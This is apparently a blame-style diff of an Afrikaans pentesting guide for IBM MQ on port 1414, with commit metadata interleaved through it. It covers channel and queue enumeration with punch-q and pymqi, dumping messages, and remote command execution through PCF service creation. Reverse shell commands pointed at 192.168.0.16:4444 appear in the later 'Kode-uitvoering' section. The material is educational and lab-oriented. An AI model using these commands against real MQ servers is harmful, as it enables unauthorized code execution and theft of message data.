-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								**punch-q** gebruik 'n interne (veranderbare) woordlys om bestaande kanale te vind. Gebruik voorbeeld:
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								```bash
 								❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
 								"DEV.ADMIN.SVRCONN" exists and was authorised.
 								"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
 								"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								Dit gebeur dat sommige IBM MQ instansies **onaangetekende** MQ versoeke aanvaar, so `--username / --password` is nie nodig nie. Natuurlik kan toegangregte ook verskil.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Sodra ons een kanaalnaam kry (hier: `DEV.ADMIN.SVRCONN`), kan ons al die ander kanale opnoem.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								Die opnoeming kan basies gedoen word met hierdie kode-snippet `code/examples/dis_channels.py` van **pymqi**:
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								```python
 								import logging
 								import pymqi
 								logging.basicConfig(level=logging.INFO)
 								queue_manager = 'MYQUEUEMGR'
 								channel = 'DEV.ADMIN.SVRCONN'
 								host = '172.17.0.2'
 								port = '1414'
 								conn_info = '%s(%s)' % (host, port)
 								user = 'admin'
 								password = 'passw0rd'
 								prefix = '*'
 								args = {pymqi.CMQCFC.MQCACH_CHANNEL_NAME: prefix}
 								qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
 								pcf = pymqi.PCFExecute(qmgr)
 								try:
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								response = pcf.MQCMD_INQUIRE_CHANNEL(args)
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								except pymqi.MQMIError as e:
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME:
 								logging.info('No channels matched prefix `%s`' % prefix)
 								else:
 								raise
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								else:
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								for channel_info in response:
 								channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME]
 								logging.info('Found channel `%s`' % channel_name)
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
 								qmgr.disconnect()
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								... Maar **punch-q** inkorporeer ook daardie deel (met meer inligting!).
 								Dit kan begin word met:
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								```bash
 								❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*'
 								Showing channels with prefix: "*"...
 								| Name                 | Type              | MCA UID | Conn Name | Xmit Queue | Description     | SSL Cipher |
 								|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
 								| DEV.ADMIN.SVRCONN    | Server-connection |         |           |            |                 |            |
 								| DEV.APP.SVRCONN      | Server-connection | app     |           |            |                 |            |
 								| SYSTEM.AUTO.RECEIVER | Receiver          |         |           |            | Auto-defined by |            |
 								| SYSTEM.AUTO.SVRCONN  | Server-connection |         |           |            | Auto-defined by |            |
 								| SYSTEM.DEF.AMQP      | AMQP              |         |           |            |                 |            |
 								| SYSTEM.DEF.CLUSRCVR  | Cluster-receiver  |         |           |            |                 |            |
 								| SYSTEM.DEF.CLUSSDR   | Cluster-sender    |         |           |            |                 |            |
 								| SYSTEM.DEF.RECEIVER  | Receiver          |         |           |            |                 |            |
 								| SYSTEM.DEF.REQUESTER | Requester         |         |           |            |                 |            |
 								| SYSTEM.DEF.SENDER    | Sender            |         |           |            |                 |            |
 								| SYSTEM.DEF.SERVER    | Server            |         |           |            |                 |            |
 								| SYSTEM.DEF.SVRCONN   | Server-connection |         |           |            |                 |            |
 								| SYSTEM.DEF.CLNTCONN  | Client-connection |         |           |            |                 |            |
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								### Queues
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								Daar is 'n kode-snippet met **pymqi** (`dis_queues.py`) maar **punch-q** laat toe om meer stukke inligting oor die queues te verkry:
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								```bash
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*'
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								Showing queues with prefix: "*"...
 								| Created   | Name                 | Type   | Usage   | Depth  | Rmt. QM | Rmt. Qu | Description                       |
 								|           |                      |        |         |        | GR Name | eue Nam |                                   |
 								|           |                      |        |         |        |         | e       |                                   |
 								|-----------|----------------------|--------|---------|--------|---------|---------|-----------------------------------|
 								| 2023-10-1 | DEV.DEAD.LETTER.QUEU | Local  | Normal  | 0      |         |         |                                   |
 								| 0 18.35.1 | E                    |        |         |        |         |         |                                   |
 								| 9         |                      |        |         |        |         |         |                                   |
 								| 2023-10-1 | DEV.QUEUE.1          | Local  | Normal  | 0      |         |         |                                   |
 								| 0 18.35.1 |                      |        |         |        |         |         |                                   |
 								| 9         |                      |        |         |        |         |         |                                   |
 								| 2023-10-1 | DEV.QUEUE.2          | Local  | Normal  | 0      |         |         |                                   |
 								| 0 18.35.1 |                      |        |         |        |         |         |                                   |
 								| 9         |                      |        |         |        |         |         |                                   |
 								| 2023-10-1 | DEV.QUEUE.3          | Local  | Normal  | 0      |         |         |                                   |
 								| 0 18.35.1 |                      |        |         |        |         |         |                                   |
 								| 9         |                      |        |         |        |         |         |                                   |
 								# Truncated
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								## Exploit
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								### Dump boodskappe
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								Jy kan rye(s)/kanaal(e) teiken om boodskappe uit hulle te snuffel / te dump (nie-destructiewe operasie). *Voorbeelde:*
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								```bash
 								❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff
 								```
 								```bash
 								❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								**Moet nie huiwer om op alle geïdentifiseerde rye te iterate nie.**
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Kode-uitvoering
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								> Sommige besonderhede voordat ons voortgaan: IBM MQ kan op verskeie maniere beheer word: MQSC, PCF, Kontroleopdrag. Sommige algemene lyste kan gevind word in [IBM MQ dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.2?topic=reference-command-sets-comparison).
 								> [**PCF**](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=commands-introduction-mq-programmable-command-formats) (***Programmeerbare Opdrag Formate***) is waaroor ons fokus om op afstand met die instansie te kommunikeer. **punch-q** en verder **pymqi** is gebaseer op PCF-interaksies.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								>
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								> Jy kan 'n lys van PCF-opdragte vind:
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								> * [Van PCF dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=reference-definitions-programmable-command-formats), en
 								> * [van konstantes](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqcmd-command-codes).
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								>
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								> Een interessante opdrag is `MQCMD_CREATE_SERVICE` en sy dokumentasie is beskikbaar [hier](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-change-copy-create-service-multiplatforms). Dit neem as argument 'n `StartCommand` wat na 'n plaaslike program op die instansie verwys (voorbeeld: `/bin/sh`).
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								>
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								> Daar is ook 'n waarskuwing van die opdrag in die dokumentasie: *"Let op: Hierdie opdrag laat 'n gebruiker toe om 'n arbitrêre opdrag met mqm gesag uit te voer. As regte toegestaan word om hierdie opdrag te gebruik, kan 'n kwaadwillige of onverskillige gebruiker 'n diens definieer wat jou stelsels of data benadeel, byvoorbeeld deur noodsaaklike lêers te verwyder."*
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								>
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								> *Nota: altyd volgens IBM MQ dokumentasie (Administrasie Verwysing), is daar ook 'n HTTP-eindpunt by `/admin/action/qmgr/{qmgrName}/mqsc` om die ekwivalente MQSC-opdrag vir dienscreatie (`DEFINE SERVICE`) uit te voer. Hierdie aspek is nog nie hier behandel nie.*
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								Die dienscreatie / -verwydering met PCF vir afstandprogramuitvoering kan gedoen word deur **punch-q**:
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								**Voorbeeld 1**
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								```bash
 								❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id"
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								> In die logs van IBM MQ kan jy lees dat die opdrag suksesvol uitgevoer is:
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								>
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								> ```bash
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								> 2023-10-10T19:13:01.713Z AMQ5030I: Die Opdrag '808544aa7fc94c48' het begin. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								> ```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								Jy kan ook bestaande programme op die masjien opnoem (hier `/bin/doesnotexist` ... bestaan nie):
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								```bash
 								❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
-												Update 1414-pentesting-ibmmq.md (typos)
											
										
										
											2023-10-12 11:52:24 +00:00
+								s "whatever"
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								Command: /bin/doesnotexist
 								Arguments: -c id
 								Service Name: 6e3ef5af652b4436
 								Creating service...
 								Starting service...
 								The program '/bin/doesnotexist' is not available on the remote system.
 								Giving the service 0 second(s) to live...
 								Cleaning up service...
 								Done
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								**Wees bewus dat die programontplooi asynchrone is. So jy het 'n tweede item nodig om die uitbuiting te benut** ***(luisteraar vir omgekeerde dop, lêer skep op 'n ander diens, data eksfiltrasie deur netwerk ...)***
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								**Voorbeeld 2**
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								Vir 'n maklike omgekeerde dop, **punch-q** bied ook twee omgekeerde dop payloads aan:
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								* Een met bash
 								* Een met perl
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								*Natuurlik kan jy 'n pasgemaakte een bou met die `execute` opdrag.*
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Vir bash:
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								```bash
 								❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Vir perl:
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								```bash
 								❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								### Custom PCF
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								Jy kan in die IBM MQ dokumentasie delf en direk die **pymqi** python biblioteek gebruik om spesifieke PCF opdragte te toets wat nie in **punch-q** geïmplementeer is nie.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								**Example:**
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								```python
 								import pymqi
 								queue_manager = 'MYQUEUEMGR'
 								channel = 'DEV.ADMIN.SVRCONN'
 								host = '172.17.0.2'
 								port = '1414'
 								conn_info = '%s(%s)' % (host, port)
 								user = 'admin'
 								password = 'passw0rd'
 								qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
 								pcf = pymqi.PCFExecute(qmgr)
 								try:
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								# Replace here with your custom PCF args and command
 								# The constants can be found in pymqi/code/pymqi/CMQCFC.py
 								args = {pymqi.CMQCFC.xxxxx: "value"}
 								response = pcf.MQCMD_CUSTOM_COMMAND(args)
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								except pymqi.MQMIError as e:
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								print("Error")
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								else:
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								# Process response
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
 								qmgr.disconnect()
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								As jy nie die konstante name kan vind nie, kan jy na die [IBM MQ dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqca-character-attribute-selectors) verwys.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								> *Voorbeeld vir [`MQCMD_REFRESH_CLUSTER`](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-mqcmd-refresh-cluster-refresh-cluster) (Desimaal = 73). Dit benodig die parameter `MQCA_CLUSTER_NAME` (Desimaal = 2029) wat `*` kan wees (Dok: ):*
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								>
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								> ```python
 								> import pymqi
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								>
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								> queue_manager = 'MYQUEUEMGR'
 								> channel = 'DEV.ADMIN.SVRCONN'
 								> host = '172.17.0.2'
 								> port = '1414'
 								> conn_info = '%s(%s)' % (host, port)
 								> user = 'admin'
 								> password = 'passw0rd'
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								>
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								> qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
 								> pcf = pymqi.PCFExecute(qmgr)
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								>
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								> try:
 								>     args = {2029: "*"}
 								>     response = pcf.MQCMD_REFRESH_CLUSTER(args)
 								> except pymqi.MQMIError as e:
 								>     print("Error")
 								> else:
 								>     print(response)
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								>
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								> qmgr.disconnect()
 								> ```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								## Toetsomgewing
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								As jy die IBM MQ gedrag en exploits wil toets, kan jy 'n plaaslike omgewing opstel gebaseer op Docker:
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+. Om 'n rekening op ibm.com en cloud.ibm.com te hê.
 . Skep 'n gekonteiniseerde IBM MQ met:
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								```bash
 								sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
 								sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								Deur standaard is die outentisering geaktiveer, die gebruikersnaam is `admin` en die wagwoord is `passw0rd` (Omgewing veranderlike `MQ_ADMIN_PASSWORD`). Hier is die wagterbestuurder se naam gestel op `MYQUEUEMGR` (veranderlike `MQ_QMGR_NAME`).
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								Jy moet die IBM MQ aan en loop hê met sy poorte blootgestel:
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								```bash
 								❯ sudo docker ps
 								CONTAINER ID   IMAGE                                COMMAND                  CREATED         STATUS                    PORTS                                                                    NAMES
 ead165e2fd   icr.io/ibm-messaging/mq:9.3.2.0-r2   "runmqdevserver"         3 seconds ago   Up 3 seconds              0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp   testing-ibmmq
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								> Die ou weergawe van IBM MQ docker beelde is by: https://hub.docker.com/r/ibmcom/mq/.
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								## References
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:54:19 +00:00
+								* [mgeeky's gist - "Praktiese IBM MQ Penetrasie Toetsing notas"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec)
-												Add Pentesting IBM MQ (1414)

											
										
										
											2023-10-11 23:08:45 +00:00
+								* [MQ Jumping - DEFCON 15](https://defcon.org/images/defcon-15/dc15-presentations/dc-15-ruks.pdf)
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								* [IBM MQ dokumentasie](https://www.ibm.com/docs/en/ibm-mq)